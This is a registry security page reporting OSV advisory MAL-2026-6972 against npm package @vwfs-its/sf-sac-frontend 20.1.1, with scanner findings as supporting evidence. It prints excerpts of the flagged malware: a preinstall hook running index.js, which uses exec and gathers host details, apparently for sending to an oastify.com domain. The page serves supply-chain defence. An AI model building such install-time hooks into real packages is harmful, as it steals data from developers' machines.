registry  /  @vwfs-its/sf-sac-frontend  /  20.1.1

@vwfs-its/sf-sac-frontend@20.1.1

OSV Malicious Advisory

scanned 3h ago · by OpenSSF/OSV

OpenSSF/OSV advisory MAL-2026-6972 confirms this npm version as malicious. The OpenSSF Package Analysis project identified '@vwfs-its/sf-sac-frontend' @ 20.1.1 (npm) as malicious.

Advisory
MAL-2026-6972
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in @vwfs-its/sf-sac-frontend (npm)
Details
The OpenSSF Package Analysis project identified '@vwfs-its/sf-sac-frontend' @ 20.1.1 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Decision reason
One or more suspicious static signals were detected.
References

Decision evidence

public snapshot
Behavioral surface
Source
ChildProcessNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 2.94 KB of source, external domains: rsnchacyin4dnjv0oc8prrwn1e77vzjo.oastify.com

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.preinstall = node index.js
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
index.jsView file
1const { exec } = require('child_process'); L2: const os = require('os'); L3: const https = require('https'); L4: const http = require('http'); ... L12: return new Promise((resolve, reject) => { L13: exec(command, (error, stdout, stderr) => { L14: if (error) { ... L30: pwd: '', L31: hostname: os.hostname(), L32: platform: os.platform(), ... L96: if (res.statusCode >= 200 && res.statusCode < 300) { L97: resolve({ statusCode: res.statusCode, body: responseData });
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

index.jsView on unpkg · L1

Findings

2 High2 Medium3 Low
HighInstall Time Lifecycle Scriptspackage.json
HighSandbox Evasion Gated Capabilityindex.js
MediumNetwork
MediumStructural Risk Force Deep Review
LowScripts Present
LowHigh Entropy Strings
LowUrl Strings